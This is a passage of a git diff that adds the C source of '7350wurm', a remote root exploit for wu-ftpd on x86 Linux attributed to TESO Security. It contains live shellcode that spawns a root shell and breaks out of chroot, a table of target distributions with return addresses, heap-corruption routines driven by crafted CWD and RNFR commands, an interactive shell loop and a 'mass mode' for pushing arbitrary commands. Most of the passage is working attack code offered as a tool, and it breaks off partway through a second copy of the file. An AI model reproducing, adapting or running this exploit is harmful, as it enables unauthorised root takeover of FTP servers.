+                exit (EXIT_SUCCESS);
+        }
+        if (tgt == NULL && automode == 0)
+                tgt = &targets[tgt_num - 1];
+        if (mass == 1) {
+                if ((argc - optind) == 0)
+                        usage (progname);
+                mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
+                        x86_lnx_execve, &argv[optind]);
+                if (mlen >= 0xff) {
+                        fprintf (stderr, "created argv-code too long "
+                                "(%d bytes)\n", mlen);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
+        }
+        printf ("# trying to log into %s with (%s/%s) ...", dest,
+                username, password);
+        fflush (stdout);
+        fd = ftp_login (dest, username, password);
+        if (fd <= 0) {
+                fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
+                exit (EXIT_FAILURE);
+        }
+        printf (" connected.\n");
+        if (debugmode) {
+                printf ("DEBUG: press enter\n");
+                getchar ();
+        }
+        printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
+                ftp_banner);
+        if (tgt == NULL && automode) {
+                tgt = tgt_frombanner (ftp_banner);
+                if (tgt == NULL) {
+                        printf ("# failed to jield target from banner, aborting\n");
+                        exit (EXIT_FAILURE);
+                }
+                printf ("# successfully selected target from banner\n");
+        }
+        if (shellcode == NULL) {
+                shellcode = tgt->shellcode;
+                shellcode_len = tgt->shellcode_len;
+        }
+        if (verbose >= 2) {
+                printf ("using %lu byte shellcode:\n", shellcode_len);
+                hexdump ("shellcode", shellcode, shellcode_len);
+        }
+        if (user_retaddr != 0) {
+                fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
+                        user_retaddr);
+        }
+        if (user_retloc != 0) {
+                fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
+                        user_retloc);
+                tgt->retloc = user_retloc;
+        }
+        printf ("\n### TARGET: %s\n\n", tgt->desc);
+        /* real stuff starts from here
+         */
+        printf ("# 1. filling memory gaps\n");
+        xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
+        exploit (fd, tgt);
+        printf ("# 3. triggering free(globlist[1])\n");
+        net_write (fd, "CWD ~{\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
+        if (strncmp (xpbuf, "sP", 2) != 0) {
+                fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
+                        xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        printf ("#\n# exploitation succeeded. sending real shellcode\n");
+        if (mass == 1) {
+                printf ("# mass mode, sending constructed argv code\n");
+                write (fd, mcode, mlen);
+                printf ("# send. sleeping 10 seconds\n");
+                sleep (10);
+                printf ("# success.\n");
+                exit (EXIT_SUCCESS);
+        }
+        printf ("# sending setreuid/chroot/execve shellcode\n");
+        net_write (fd, "%s", x86_lnx_shell);
+        printf ("# spawning shell\n");
+        printf ("##################################################"
+                        "##########################\n");
+        write (fd, INIT_CMD, strlen (INIT_CMD));
+        shell (fd);
+        exit (EXIT_SUCCESS);
+}
+void
+exploit (int fd, tgt_type *tgt)
+{
+        unsigned long int       dir_chunk_size,
+                                bridge_dist,
+                                padchunk_size,
+                                fakechunk_size,
+                                pad_before;
+        unsigned char *         dl;     /* dirlength */
+        unsigned char           xpbuf[512 + 64];
+        /* figure out home directory length
+         */
+        net_write (fd, "PWD\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
+        dl = strchr (xpbuf, '"');
+        if (dl == NULL || strchr (dl + 1, '"') == NULL) {
+                fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
+                exit (EXIT_FAILURE);
+        }
+        dir_chunk_size = 0;
+        for (dl += 1 ; *dl != '"' ; ++dl)
+                dir_chunk_size += 1;
+        if (verbose)
+                printf ("PWD path (%lu): %s\n", dir_chunk_size, xpbuf);
+        /* compute chunk size from it (needed later)
+         */
+        dir_chunk_size += 3;    /* ~/ + NUL byte */
+        dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
+        if (debugmode)
+                printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
+        /* send preparation buffer to store the fakechunk in the end of
+         * the malloc buffer allocated from within the parser ($1)
+         */
+        printf ("# 2. sending bigbuf + fakechunk\n");
+        xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
+        if (verbose)
+                hexdump ("xpbuf", xpbuf, strlen (xpbuf));
+        ftp_escape (xpbuf, sizeof (xpbuf));
+        net_write (fd, "CWD %s\n", xpbuf);
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
+        /* synnergy.net uberleet method (thank you very much guys !)
+         */
+        net_write (fd, "CWD ~/{.,.,.,.}\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* now, we flush the last-used-chunk marker in glibc malloc code. else
+         * we might land in a previously used bigger chunk, but we need a
+         * sequential order. "CWD ." will allocate a two byte chunk, which will
+         * be reused on any later small malloc.
+         */
+        net_write (fd, "CWD .\n");
+        ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
+        /* cause chunk with padding size
+         */
+        pad_before = CHUNK_ALLSIZE (strlen ("~/{.,.,.,.}\n")) +
+                        dir_chunk_size - 0x08;
+        xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (pad_before));
+        /* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
+        bridge_dist = 0x10 + 4 * dir_chunk_size;
+        if (debugmode)
+                printf ("bridge_dist = 0x%08lx\n", bridge_dist);
+        /* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
+        padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
+        if (debugmode)
+                printf ("padchunk_size = 0x%08lx\n", padchunk_size);
+        /* +4 = this_size field itself */
+        fakechunk_size = CHUNK_POS + 4;
+        fakechunk_size -= pad_before;
+        fakechunk_size += 0x04; /* account for prev_size, too */
+        fakechunk_size |= 0x1;  /* set PREV_INUSE */
+        if (debugmode)
+                printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
+        xp_buildsize (fd, fakechunk_size, 0x10);
+        /* pad down to the minimum possible size in 8 byte alignment
+         */
+        if (verbose)
+                printf ("\npadchunk_size = 0x%08lx\n==> %lu\n",
+                        padchunk_size, padchunk_size - 8 - 1);
+        xp_gapfill (fd, 1, padchunk_size - 8 - 1);
+        if (debugmode) {
+                printf ("press enter\n");
+                getchar ();
+        }
+        return;
+}
+/* tgt_list
+ *
+ * give target list
+ */
+void
+tgt_list (void)
+{
+        int     tgt_num;
+        printf ("num . description\n");
+        printf ("----+-----------------------------------------------"
+                "--------\n");
+        for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
+                printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
+                if (verbose)
+                        printf ("    :    %s\n", targets[tgt_num].banner);
+                if (verbose >= 2)
+                        printf ("    :    retloc: 0x%08lx   "
+                                "cbuf: 0x%08lx\n",
+                                targets[tgt_num].retloc,
+                                targets[tgt_num].cbuf);
+        }
+        printf ("    '\n");
+        return;
+}
+/* tgt_frombanner
+ *
+ * try to automatically select target from ftp banner
+ *
+ * return pointer to target structure on success
+ * return NULL on failure
+ */
+tgt_type *
+tgt_frombanner (unsigned char *banner)
+{
+        int     tw;     /* target list walker */
+        for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
+                if (strstr (banner, targets[tw].banner) != NULL)
+                        return (&targets[tw]);
+        }
+        return (NULL);
+}
+/* xp_buildsize
+ *
+ * set chunksize to this_size_ls. do this in a csize bytes long chunk.
+ * normally csize = 0x10. csize is always a padded chunksize.
+ */
+void
+xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
+{
+        int             n,
+                        cw;     /* chunk walker */
+        unsigned char   tmpbuf[512];
+        unsigned char * leet = "7350";
+        for (n = 2 ; n > 0 ; --n) {
+                memset (tmpbuf, '\0', sizeof (tmpbuf));
+                for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
+                        tmpbuf[cw] = leet[cw % 4];
+                tmpbuf[cw - 4 + n] = '\0';
+                if (debugmode)
+                        printf (": CWD %s\n", tmpbuf);
+                net_write (fd, "CWD %s\n", tmpbuf);
+                ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        }
+        memset (tmpbuf, '\0', sizeof (tmpbuf));
+        for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
+                tmpbuf[cw] = leet[cw % 4];
+        if (debugmode)
+                printf ("| CWD %s\n", tmpbuf);
+        net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
+        ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
+        /* send a minimum-sized malloc request that will allocate a chunk
+         * with 'csize' overall bytes
+         */
+        xp_gapfill (fd, 1, CHUNK_STRROUNDDOWN (csize));
+        return;
+}
+/* xp_gapfill
+ *
+ * fill all small memory gaps in wuftpd malloc space. do this by sending
+ * rnfr requests which cause a memleak in wuftpd.
+ *
+ * return in any case
+ */
+void
+xp_gapfill (int fd, int rnfr_num, int rnfr_size)
+{
+        int             n;
+        unsigned char * rb;             /* rnfr buffer */
+        unsigned char * rbw;            /* rnfr buffer walker */
+        unsigned char   rcv_buf[512];   /* temporary receive buffer */
+        if (debugmode)
+                printf ("RNFR: %d x 0x%08x (%d)\n",
+                        rnfr_num, rnfr_size, rnfr_size);
+        rbw = rb = calloc (1, rnfr_size + 6);
+        strcpy (rbw, "RNFR ");
+        rbw += strlen (rbw);
+        /* append a string of "././././". since wuftpd only checks whether
+         * the pathname is lstat'able, it will go through without any problems
+         */
+        for (n = 0 ; n < rnfr_size ; ++n)
+                strcat (rbw, ((n % 2) == 0) ? "." : "/");
+        strcat (rbw, "\n");
+        for (n = 0 ; n < rnfr_num; ++n) {
+                net_write (fd, "%s", rb);
+                ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
+        }
+        free (rb);
+        return;
+}
+#define ADDR_STORE(ptr,addr){\
+        ((unsigned char *) (ptr))[0] = (addr) & 0xff;\
+        ((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
+        ((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
+        ((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
+}
+int
+xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
+{
+        unsigned char * wl;
+        memset (buf, '\0', buf_len);
+        memset (buf, '0', CHUNK_POS);
+        xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
+        for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
+                wl[0] = '\xeb';
+                wl[1] = '\x0c';
+        }
+        memcpy (&buf[buf_len - 1] - shellcode_len, shellcode,
+                shellcode_len);
+        return (strlen (buf));
+}
+/* xp_buildchunk
+ *
+ * build the fake malloc chunk that will overwrite retloc with retaddr
+ */
+void
+xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
+{
+        unsigned long int       retaddr_eff;    /* effective */
+        if (user_retaddr)
+                retaddr_eff = user_retaddr;
+        else
+                retaddr_eff = tgt->cbuf + 512 - shellcode_len - 16;
+        fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
+                tgt->retloc, retaddr_eff, clen);
+        /* easy, straight forward technique
+         */
+        ADDR_STORE (&cspace[0], 0xfffffff0);            /* prev_size */
+        ADDR_STORE (&cspace[4], 0xfffffffc);            /* this_size */
+        ADDR_STORE (&cspace[8], tgt->retloc - 12);      /* fd */
+        ADDR_STORE (&cspace[12], retaddr_eff);          /* bk */ 
+        return;
+}
+void
+shell (int sock)
+{
+        int     l;
+        char    buf[512];
+        fd_set  rfds;
+        while (1) {
+                FD_SET (0, &rfds);
+                FD_SET (sock, &rfds);
+                select (sock + 1, &rfds, NULL, NULL, NULL);
+                if (FD_ISSET (0, &rfds)) {
+                        l = read (0, buf, sizeof (buf));
+                        if (l <= 0) {
+                                perror ("read user");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (sock, buf, l);
+                }
+                if (FD_ISSET (sock, &rfds)) {
+                        l = read (sock, buf, sizeof (buf));
+                        if (l == 0) {
+                                printf ("connection closed by foreign host.\n");
+                                exit (EXIT_FAILURE);
+                        } else if (l < 0) {
+                                perror ("read remote");
+                                exit (EXIT_FAILURE);
+                        }
+                        write (1, buf, l);
+                }
+        }
+}
+/*** FTP functions
+ */
+/* FTP is TELNET is SHIT.
+ */
+void
+ftp_escape (unsigned char *buf, unsigned long int buflen)
+{
+        unsigned char * obuf = buf;
+        for ( ; *buf != '\0' ; ++buf) {
+                if (*buf == 0xff &&
+                        (((buf - obuf) + strlen (buf) + 1) < buflen))
+                {
+                        memmove (buf + 1, buf, strlen (buf) + 1);
+                        buf += 1;
+                }
+        }
+}
+void
+ftp_recv_until (int sock, char *buff, int len, char *begin)
+{
+        char    dbuff[2048];
+        if (buff == NULL) {
+                buff = dbuff;
+                len = sizeof (dbuff);
+        }
+        do {
+                memset (buff, '\x00', len);
+                if (net_rlinet (sock, buff, len - 1, 20) <= 0)
+                        return;
+        } while (memcmp (buff, begin, strlen (begin)) != 0);
+        return;
+}
+int
+ftp_login (char *host, char *user, char *pass)
+{
+        int     ftpsock;
+        char    resp[512];
+        ftpsock = net_connect (NULL, host, 21, 30);
+        if (ftpsock <= 0)
+                return (0);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline pre-login stuff (rfc violation !)
+         */
+        if (memcmp (resp, "220-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
+        if (memcmp (resp, "220 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        ftp_banner = strdup (resp);
+        net_write (ftpsock, "USER %s\n", user);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        if (memcmp (resp, "331 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        net_write (ftpsock, "PASS %s\n", pass);
+        memset (resp, '\x00', sizeof (resp));
+        if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
+                goto flerr;
+        /* handle multiline responses from ftp servers
+         */
+        if (memcmp (resp, "230-", 4) == 0)
+                ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
+        if (memcmp (resp, "230 ", 4) != 0) {
+                if (verbose)
+                        printf ("\n%s\n", resp);
+                goto flerr;
+        }
+        return (ftpsock);
+flerr:
+        if (ftpsock > 0)
+                close (ftpsock);
+        return (0);
+}
+/* ripped from zodiac */
+void
+hexdump (char *desc, unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        printf ("/* %s, %u bytes */\n", desc, amount);
+        for (dp = 1; dp <= amount; dp++) {
+                fprintf (stderr, "%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        fprintf (stderr, " ");
+                if ((dp % 16) == 0) {
+                        fprintf (stderr, "| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                fprintf (stderr, "%c", trans[data[dp]]);
+                        fflush (stderr);
+                        fprintf (stderr, "\n");
+                }
+                fflush (stderr);
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        fprintf (stderr, "   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                fprintf (stderr, " ");
+                        fflush (stderr);
+                }
+                fprintf (stderr, " | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        fprintf (stderr, "%c", trans[data[dp]]);
+                fflush (stderr);
+        }
+        fprintf (stderr, "\n");
+        return;
+}
+unsigned long int
+net_resolve (char *host)
+{
+        long            i;
+        struct hostent  *he;
+        i = inet_addr(host);
+        if (i == -1) {
+                he = gethostbyname(host);
+                if (he == NULL) {
+                        return (0);
+                } else {
+                        return (*(unsigned long *) he->h_addr);
+                }
+        }
+        return (i);
+}
+int
+net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec)
+{
+        int                     n,
+                                len,
+                                error,
+                                flags;
+        int                     fd;
+        struct timeval          tv;
+        fd_set                  rset, wset;
+        struct sockaddr_in      csa;
+        if (cs == NULL)
+                cs = &csa;
+        /* first allocate a socket */
+        cs->sin_family = AF_INET;
+        cs->sin_port = htons (port);
+        fd = socket (cs->sin_family, SOCK_STREAM, 0);
+        if (fd == -1)
+                return (-1);
+        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+                close (fd);
+                return (-1);
+        }
+        flags = fcntl (fd, F_GETFL, 0);
+        if (flags == -1) {
+                close (fd);
+                return (-1);
+        }
+        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1) {
+                close (fd);
+                return (-1);
+        }
+        error = 0;
+        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+        if (n < 0) {
+                if (errno != EINPROGRESS) {
+                        close (fd);
+                        return (-1);
+                }
+        }
+        if (n == 0)
+                goto done;
+        FD_ZERO(&rset);
+        FD_ZERO(&wset);
+        FD_SET(fd, &rset);
+        FD_SET(fd, &wset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        n = select(fd + 1, &rset, &wset, NULL, &tv);
+        if (n == 0) {
+                close(fd);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1)
+                return (-1);
+        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+                        len = sizeof(error);
+                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+                                errno = ETIMEDOUT;
+                                return (-1);
+                        }
+                        if (error == 0) {
+                                goto done;
+                        } else {
+                                errno = error;
+                                return (-1);
+                        }
+                }
+        } else
+                return (-1);
+done:
+        n = fcntl(fd, F_SETFL, flags);
+        if (n == -1)
+                return (-1);
+        return (fd);
+}
+void
+net_write (int fd, const char *str, ...)
+{
+        char    tmp[1025];
+        va_list vl;
+        int     i;
+        va_start(vl, str);
+        memset(tmp, 0, sizeof(tmp));
+        i = vsnprintf(tmp, sizeof(tmp), str, vl);
+        va_end(vl);
+#ifdef DEBUG
+        printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
+#endif
+        send(fd, tmp, i, 0);
+        return;
+}
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+        int                     n;
+        unsigned long int       rb = 0;
+        struct timeval          tv_start, tv_cur;
+        memset(buf, '\0', bufsize);
+        (void) gettimeofday(&tv_start, NULL);
+        do {
+                (void) gettimeofday(&tv_cur, NULL);
+                if (sec > 0) {
+                        if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+                                ((tv_start.tv_sec * 1000000) +
+                                (tv_start.tv_usec))) > (sec * 1000000))
+                        {
+                                return (-1);
+                        }
+                }
+                n = net_rtimeout(fd, NET_READTIMEOUT);
+                if (n <= 0) {
+                        return (-1);
+                }
+                n = read(fd, buf, 1);
+                if (n <= 0) {
+                        return (n);
+                }
+                rb++;
+                if (*buf == '\n')
+                        return (rb);
+                buf++;
+                if (rb >= bufsize)
+                        return (-2);    /* buffer full */
+        } while (1);
+}
+int
+net_rtimeout (int fd, int sec)
+{
+        fd_set          rset;
+        struct timeval  tv;
+        int             n, error, flags;
+        error = 0;
+        flags = fcntl(fd, F_GETFL, 0);
+        n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+        if (n == -1)
+                return (-1);
+        FD_ZERO(&rset);
+        FD_SET(fd, &rset);
+        tv.tv_sec = sec;
+        tv.tv_usec = 0;
+        /* now we wait until more data is received then the tcp low level
+         * watermark, which should be setted to 1 in this case (1 is default)
+         */
+        n = select(fd + 1, &rset, NULL, NULL, &tv);
+        if (n == 0) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+        if (n == -1) {
+                return (-1);
+        }
+        /* socket readable ? */
+        if (FD_ISSET(fd, &rset)) {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                return (1);
+        } else {
+                n = fcntl(fd, F_SETFL, flags);
+                if (n == -1)
+                        return (-1);
+                errno = ETIMEDOUT;
+                return (-1);
+        }
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/exploits/7350wurm/backup/7350wurm-backup2.c b/exploits/7350wurm/backup/7350wurm-backup2.c
new file mode 100644
index 0000000..beed3f3
--- /dev/null
+++ b/exploits/7350wurm/backup/7350wurm-backup2.c
@@ -0,0 +1,1034 @@
+/* 7350wurm - x86/linux wu-ftpd remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * The distribution restrictions cover the entire file, including this
+ * header notice. (This means, you are not allowed to reproduce the header).
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * thanks to bnuts, tomas and dvorak for hints, discussions and ideas.
+ */
+#define VERSION "0.0.2"
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <string.h>
+#include <time.h>
+#define INIT_CMD        "unset HISTFILE;id;uname -a;\n"
+/* shellcodes
+ */
+unsigned char   x86_lnx_loop[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\xeb\xfe";
+/* x86/linux write/read/exec code (41 bytes)
+ * does: 1. write (1, "AAA\n", 4);
+ *       2. read (0, ncode, 0xff);
+ *       3. jmp ncode
+ */
+unsigned char   x86_wrx[] =
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
+        "\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
+        "\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
+        "\x80\xeb\x05\xe8\xed\xff\xff\xff";
+unsigned char   x86_lnx_execve[] =
+        /* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
+         * code by lorian / teso
+         */
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        /* 38 byte x86/linux PIC argv -scut
+         */
+        "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
+        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
+        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
+        "\xff\xff";
+/* setreuid/chroot/execve
+ * lorian / teso */
+unsigned char   x86_lnx_shell[] =
+        "\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
+        "\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
+        "\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
+        "\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
+        "\x80"
+        "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+/* HOWTO get the offsets:
+   ...
+   5. retloc
+      GOT of free
+ */
+typedef struct {
+        char *                  desc;           /* distribution */
+        char *                  banner;         /* ftp banner part */
+        unsigned char *         shellcode;
+        unsigned int            shellcode_len;
+        unsigned long int       retloc;         /* return address location */
+        unsigned long int       retaddr;        /* return address */
+        /* absolute address of big malloc buffer
+         */
+        unsigned long int       buf_addr;
+        /* bytes in first part of LIST parameter until where the
+         * free pointer is
+         */
+        unsigned int            chunk_start;
+        /* where we store our fakechunk, relative from buf_addr */
+        /* rnfr_num = number of times to do rnfr
+         * rnfr_size = size of malloc on rnfr
+         */
+        int                     rnfr_num;
+        int                     rnfr_size;
+        /* number of bytes to fill after ~{ to fill hole in memory and make
+         * globlist go in the right place
+         */
+        int                     malloc_filler;
+} tgt_type;
+tgt_type targets[] = {
+#if 0
+        { "DEBUG: crash target", NULL,
+                x86_lnx_loop, sizeof (x86_lnx_loop) - 1,
+                0x55555555, 0x66666666, 20, 0x73507350, 40 ,0},
+#endif
+        { "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
+                "Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0806e7a0, 0x08093e50,
+                0x08093d98, 0x2c,
+                50, 8,
+                0 },
+        { "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
+                "Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x55555555, 0x66666666,
+                0x42424242, 0x2c,
+                20, 8,
+                400 },
+        { "-sc RedHat 7.1 [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16(1)",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08097e10, /* retloc / retaddr */
+                0x42424242, 0x4,        /* buf_addr, chunk_start */
+                200, 8,                 /* rnfr_num, rnfr_size */
+                200 },                  /* malloc_filler */
+        { "RedHat 7.1 [wu-ftpd-2.6.1-16.rpm]",
+                "Version wu-2.6.1-16(1)",
+                x86_wrx, sizeof (x86_wrx) - 1,
+                0x0807314c, 0x08097e10, /* retloc / retaddr */
+                0x08090c04, 0x4,        /* buf_addr, chunk_start */
+                20, 8,                  /* rnfr_num, rnfr_size */
+                200 },                  /* malloc_filler */
+        { NULL, NULL, 0, 0, 0, 0 },
+};
+/* FTP related stuff
+ */
+char *  dest = "127.0.0.1";     /* can be changed with -d */
+char *  username = "ftp";       /* can be changed with -u */
+char *  password = "mozilla@";  /* can be changed with -p */
+char *  ftp_banner = NULL;
+int     verbose = 0;
+/* FTP prototypes
+ */
+void ftp_escape (unsigned char *buf, unsigned long int buflen);
+void ftp_recv_until (int sock, char *buff, int len, char *begin);
+int ftp_login (char *host, char *user, char *pass);
+/* main prototypes
+ */
+void usage (char *progname);
+unsigned char * xp_mallocfiller (tgt_type *tgt);
+void xp_gapfill (tgt_type *tgt, int fd);
+int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
+void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
+void shell (int sock);
+void hexdump (char *desc, unsigned char *data, unsigned int amount);
+/*** MASS mode stuff
+ */
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int             mass = 0;       /* enable with -m (kids, get hurt!) */
+unsigned int    mlen = 0;
+unsigned char   mcode[256];
+/* imported from network.c
+ */
+#define NET_CONNTIMEOUT 60
+#define NET_READTIMEOUT 20
+int     net_conntimeout = NET_CONNTIMEOUT;
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+        unsigned short int port, int sec);
+void net_write (int fd, const char *str, ...);
+int net_rtimeout (int fd, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-v] [-t <num>] [-u <user>] "
+                "[-p <pass>] [-h host]\n\n", progname);
+        fprintf (stderr, "-h\tthis help\n"
+                "-v\tbe verbose (default: off)\n"
+                "-t num\tchoose target (0 for list)\n"
+                "-m\tenable mass mode (use with care)\n"
